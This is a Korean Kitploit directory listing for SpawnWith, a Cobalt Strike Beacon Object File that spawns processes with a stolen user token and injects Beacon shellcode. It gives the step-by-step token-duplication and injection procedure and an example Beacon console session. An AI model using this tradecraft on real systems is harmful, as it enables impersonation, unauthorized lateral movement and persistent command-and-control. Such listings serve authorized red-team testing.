Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/rasta-mouse/spawnwith
Privilege EscalationImpersonation ToolsLateral MovementPost-ExploitationCommand and Control
GitHubrasta-mouse/spawnwith

SpawnWith

다른 사용자의 토큰을 사용하여 프로세스를 생성하고 Beacon 셸코드를 주입하여, 가장(impersonation)을 통한 사후 악용(post-exploitation) 및 횡적 이동(lateral movement)을 가능하게 하는 Cobalt Strike BOF

저장소 보기
112171년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

SpawnWith

spawnas 및 inject 명령의 대안을 제공하는 실험적인 Beacon Object File(BOF)입니다. 이는 새로운 명령 spawn_with [pid] [listener]를 노출하며, 다음을 수행합니다:

  1. 대상 프로세스에 대한 핸들을 얻습니다.
  2. 프로세스의 기본 토큰에 대한 핸들을 얻습니다.
  3. 기본 토큰을 가장 토큰으로 복제합니다.
  4. Beacon의 spawnto 값을 가져옵니다.
  5. CreateProcessWithTokenW를 사용하여 복제된 토큰으로 새 프로세스를 생성하려고 시도합니다.
    • 이 시도가 실패하면 CreateProcessAsUserW를 시도합니다.
  6. 생성된 프로세스에 Beacon 셸코드를 주입합니다.
    • P2P의 경우 Beacon에 링크합니다.

예제

root@kitploit:~
beacon> getuid
[*] You are DESKTOP-1U6AHIU\Daniel (admin)

beacon> ps
22656 21972 wordpad.exe   x64   1   DESKTOP-1U6AHIU\test_user

beacon> spawnto x64 %windir%\sysnative\notepad.exe

beacon> spawn_with 22656 tcp-local
[*] Task Beacon to run windows/beacon_bind_tcp (127.0.0.1:4444)
[+] received output:

Spawned PID 45668 and injected 297472 bytes

[+] established link to child beacon: 192.168.0.195

Beacons

도구 다운로드